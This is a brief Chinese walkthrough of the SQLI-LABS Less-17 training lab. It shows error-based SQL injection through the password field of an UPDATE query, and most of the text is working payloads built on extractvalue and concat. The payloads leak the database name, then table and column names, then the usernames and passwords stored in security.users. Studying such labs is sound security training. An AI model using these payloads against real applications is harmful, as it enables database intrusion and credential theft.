SQLI-LABS Less-17

Update

数据库更新注入，具体情况，具体分析

函数 check_input 对 '$uname' 进行检查，从 '$uname' 处是无法注入了

而对 '$passwd' 进行了更新，可以利用这个 updata 进行注入

注意：这里必须的 'uname' 必须是数据已有的记录

Less-17

闭合字符：'$passwd'

判断闭合字符：在username多次判断闭合字符无果，考虑对password位置注入

uname=admin&passwd=password'&Submit=Submit
#password 可以随便输入，updata 会对密码进行更新

查询当前数据库：

uname=admin&passwd=password' or extractvalue(1,concat(0x7e,database())) #&Submit=Submit

查询当前数据库的表：

uname=admin&passwd=password' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #&Submit=Submit

查询当前表的字段：

uname=admin&passwd=password' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #&Submit=Submit

查询数据：

uname=admin&passwd=password' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #&Submit=Submit
uname=admin&passwd=password' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #&Submit=Submit
...